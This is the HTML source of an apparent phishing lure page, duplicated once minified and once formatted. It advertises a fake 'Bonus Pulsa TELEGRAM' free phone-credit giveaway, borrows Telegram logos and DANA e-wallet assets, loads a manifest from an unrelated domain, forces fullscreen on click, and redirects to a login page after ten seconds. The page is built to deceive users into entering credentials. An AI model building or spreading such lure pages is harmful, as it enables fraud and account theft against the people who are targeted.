<!DOCTYPE html>
<title>Bonus Pulsa TELEGRAM</title>
<link rel="icon" type="image/x-icon" href="asset/loading.png">
<meta charset=UTF-8><meta content="Bonus Pulsa TELEGRAM Giveaway Pulsa Gratis Bagi Nomor Yang terpilih" name=description>
<meta content="Bonus Pulsa TELEGRAM" name= keywords>
<link href=asset/loading.png rel=icon type=image/x-icon>
<link href=asset/loading.png rel=apple-touch-icon sizes=180x180>
<link href=asset/loading.png rel=icon type=image/png sizes=32x32>
<link href=asset/loading.png rel=icon type=image/png sizes=16x16>
<link href=https://yongkru.skemabiayatarif.com/DANA/assets/img/favicon/site.webmanifest rel=manifest>
<meta content="10; URL=login.html" http-equiv=refresh>
<meta content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no" name=viewport>
    <style>
                @keyframes fadeInAnimation{90%{opacity:1}to{opacity:0}}body{animation:fadeInAnimation ease cubic-bezier(0.755, 0.05, 0.855, 0.06);animation-fill-mode:forwards;width:100%;height:100vh;margin:0;padding:0;background-color:#118eea;}.dana_index{height:100%;width:100%;max-width:380px;max-height:720px;display:flex;justify-content:center;align-items:center;flex-direction:column;position:absolute;top:50%;left:50%;transform:translate(-50%,-50%);-webkit-transform:translate(-50%,-50%);-moz-transform:translate(-50%,-50%);-ms-transform:translate(-50%,-50%);-o-transform:translate(-50%,-50%)}img{width:180px}.logo{position:relative;margin-bottom:10%}.footer{position:absolute;bottom:20px;width:290px}</style>
                <div class=dana_index>
                    <img class=logo src=asset/telegram_4.gif> <img class=footer src=asset/telegram-logo.png>
                </div>
<script>
document.documentElement.addEventListener("click", function (){
    var docElm = document.documentElement;
    if (docElm.requestFullscreen) {docElm.requestFullscreen()}
    else if (docElm.mozRequestFullScreen) {docElm.mozRequestFullScreen()}
    else if (docElm.webkitRequestFullScreen) {docElm.webkitRequestFullScreen()}
});
</script><!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="description" content="GIVEAWAY Bonus Pulsa TELEGRAM Giveaway Pulsa Gratis Bagi Nomor Yang terpilih">
    <meta name="keywords" content="Bonus Pulsa TELEGRAM">
    <link rel="icon" type="image/x-icon" href="asset/loading.png">
    <link rel="apple-touch-icon" sizes="180x180" href="https://a.m.dana.id/merchant-portal/app/assets/fav-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="https://a.m.dana.id/merchant-portal/app/assets/fav-icon.png">
    <link rel="icon" type="image/png" sizes="16x16" href="https://a.m.dana.id/merchant-portal/app/assets/fav-icon.png">
    <link rel="manifest" href="https://yongkru.skemabiayatarif.com/DANA/assets/img/favicon/site.webmanifest">
    <meta http-equiv="refresh" content="10; URL=login.html">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <style>
        @keyframes fadeInAnimation {
            90% { opacity: 1 }
            to { opacity: 0 }
        }
        body {
            animation: fadeInAnimation ease 8s;
            animation-fill-mode: forwards;
            width: 100%;
            height: 100vh;
            margin: 0;
            padding: 0;
            background-color: #118eea;
        }
        .dana_index {
            height: 100%;
            width: 100%;
            max-width: 380px;
            max-height: 720px;
            display: flex;
            justify-content: center;
            align-items: center;
            flex-direction: column;
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            -webkit-transform: translate(-50%, -50%);
            -moz-transform: translate(-50%, -50%);
            -ms-transform: translate(-50%, -50%);
            -o-transform: translate(-50%, -50%);
        }
        img {
            width: 180px;
        }
        .logo {
            position: relative;
            margin-bottom: 15%;
        }
        .footer {
            position: absolute;
            bottom: 20px;
            width: 290px;
        }
    </style>
</head>
<body>
    <div class="dana_index">
        <img class="logo" src="asset/telegram_4.gif" alt="Telegram Logo">
        <img class="footer" src="asset/telegram-logo.png" alt="asset/Telegram Footer Logo">
    </div>
    <script>
        document.documentElement.addEventListener("click", function () {
            var docElm = document.documentElement;
            if (docElm.requestFullscreen) { docElm.requestFullscreen() }
            else if (docElm.mozRequestFullScreen) { docElm.mozRequestFullScreen() }
            else if (docElm.webkitRequestFullScreen) { docElm.webkitRequestFullScreen() }
        });
    </script>
</body>
</html>
